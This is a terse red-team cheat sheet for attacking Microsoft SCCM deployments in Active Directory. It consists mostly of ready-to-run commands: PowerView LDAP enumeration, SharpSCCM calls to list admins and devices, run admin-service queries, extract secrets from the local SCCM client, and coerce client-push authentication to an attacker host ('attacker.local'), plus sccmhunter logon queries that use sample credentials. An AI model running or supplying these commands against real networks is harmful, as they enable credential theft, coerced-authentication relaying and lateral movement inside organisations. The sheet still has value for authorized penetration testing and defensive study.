Enumeration
Look for CcmExec.exe processes:
Cmd > tasklist | findstr CcmExec
Search for SCCM servers in LDAP:
PV3 > Get-DomainComputer -LDAPFilter "(&(objectClass=computer)(cn=*sccm*))" | select -ExpandProperty dnsHostName
PV3 > Get-DomainComputer | ? {$_.Name -like "*sccm*"} | select -ExpandProperty dnsHostName
VNC-like Remote Control (CmRcViewer Abuse)
MalSCCM
sccmwtf
SharpSCCM
Get SMS (Systems Management Server) and SC (Site Code):
Cmd > SharpSCCM.exe local site-info
List SCCM admins:
Cmd > SharpSCCM.exe get admins -sms <SMS> -sc <SC>
Cmd > SharpSCCM.exe get class-instances -sms <SMS> -sc <SC> SMS_R_System -p Name -p DistinguishedName -p IPAddresses -p LastLogonUserDomain -p LastLogonUserName -p LastLogonTimestamp -w "LastLogonUserName LIKE '%snovvcrash%'"
Cmd > SharpSCCM.exe get devices -p Name -p DistinguishedName -p IPAddresses -p LastLogonUserDomain -p LastLogonUserName -p LastLogonTimestamp -u snovvcrash@megacorp.local
Get resource (server) ID:
Cmd > SharpSCCM.exe get resource-id -sms <SMS> -sc <SC> -d <RESOURCE>
Execute WMI command on a resource:
Cmd > SharpSCCM.exe invoke admin-service -sms <SMS> -sc <SC> -q "EventLog('Security',4h) | where EventID == 4624 | order by DateTime desc" -r <ID>
Grab secrets from SCCM client (locally):
Cmd > SharpSCCM.exe local secrets -m disk
Coerce authentication from SCCM server (remotely):
Cmd > SharpSCCM.exe invoke client-push -t attacker.local
sccmhunter
Install:
$ pipx install -f "git+https://github.com/garrettfoster13/sccmhunter.git"
List user latest logons:
$ sccmhunter.py admin -u sccm_admin -p 'Passw0rd!' -ip SCCM.megacorp.local
$ get_lastlogon administrator
